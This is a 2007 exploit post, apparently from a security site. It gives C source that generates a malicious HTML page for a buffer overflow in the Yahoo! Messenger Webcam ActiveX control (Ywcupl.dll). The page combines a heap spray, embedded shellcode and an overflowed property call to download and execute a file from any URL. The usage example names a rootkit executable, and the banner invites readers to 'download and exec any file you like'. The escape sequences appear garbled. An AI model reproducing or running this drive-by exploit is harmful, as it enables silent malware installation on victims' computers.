exploits , vulnerabilities , articles , Yahoo! Messenger Webcam 8.1 (Ywcupl.dll) Download / Execute Exploit

Rated as : High Risk

/* 
  Compile in LCC-win32 (Free!)
  Download and exec any file you like!
  Have Fun!
  */ 

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char *file = "Click_here.html";
FILE *fp = NULL;
   
unsigned char sc[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF";
   
  
char *url = NULL;
unsigned char sc_2[] = "x00x98";
  
char * header =
"<html>n"
"<object
classid="clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277"
id='viewme'></object>n"
"<body>n"
"<SCRIPT language="javascript">n"
"var shellcode = unescape("%u9090%u9090%u9090%u9090" +
n";
  char * footer =
"nn"
"bigblock = unescape("%u9090%u9090");n"
"headersize = 20;n"
"slackspace = headersize+shellcode.length;n"
"while (bigblock.length<slackspace) bigblock+=bigblock;n"
"fillblock = bigblock.substring(0, slackspace);n"
"block = bigblock.substring(0, bigblock.length-slackspace);n"
"while(block.length+slackspace<0x40000) block =
block+block+fillblock;n"
"memory = new Array();n"
"for (x=0; x<500; x++) memory[x] = block + shellcode;n"
"var buffer = '\x0a';n"
"while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';n"
"viewme.server = buffer;n"
"viewme.initialize();n"
"viewme.send();n";
  
char * trigger_1 =
"</script>n"
"</body>n"
"</html>n";
  
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf(""n"");
fprintf(fp, "%s", "" +n"");
}
else
{
printf(""");
fprintf(fp, "%s", """);
}
}
  printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
  fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
  printf("";n");
fprintf(fp, "%s", "");n");
  
fflush(fp);
}
   
  
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
  int sc_len = 0;
int n;
  
if (argc < 2)
{
 printf("rnYahoo 0day Ywcupl.dll ActiveX Exploit Download And
Execn");

printf("link:http://research.eeye.com/html/advisories/upcoming/20070605.htmln");

printf("link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
n");
 printf("link:http://secunia.com/advisories/25547/n");
 printf("greetz to Jambalaya for helping with this coden");
 printf("rnUsage: %s <URL> [htmlfile]n", argv[0]);
 printf("rnE.g.: %s http://www.malwarehere.com/rootkit.exe
exploit.htmlrnn", argv[0]);
 printf("=-Excepti0n-=n");
exit(1);
}
  url = argv[1];
  
if( (!strstr(url, "http://") && !strstr(url,
"ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'n");
return;
}
  printf("[+] download url:%sn", url);
  if(argc >=3) file = argv[2];
printf("[+] exploit file:%sn", file);
  fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!n");
return;
}
  
//build Exploit HTML File
fprintf(fp, "%s", header);
fflush(fp);
  memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
  sc_len += strlen(url);
  memcpy(buf+sc_len, sc_2, 1);
sc_len += 1;
  PrintPayLoad((char *)buf, sc_len);
  fprintf(fp, "%s", footer);
fflush(fp);
  fprintf(fp, "%s", trigger_1);
fflush(fp);
  
printf("[+] exploit write to %s success!n", file);
}

// =-Excepti0n-= 

securitydot.net - 2007-06-09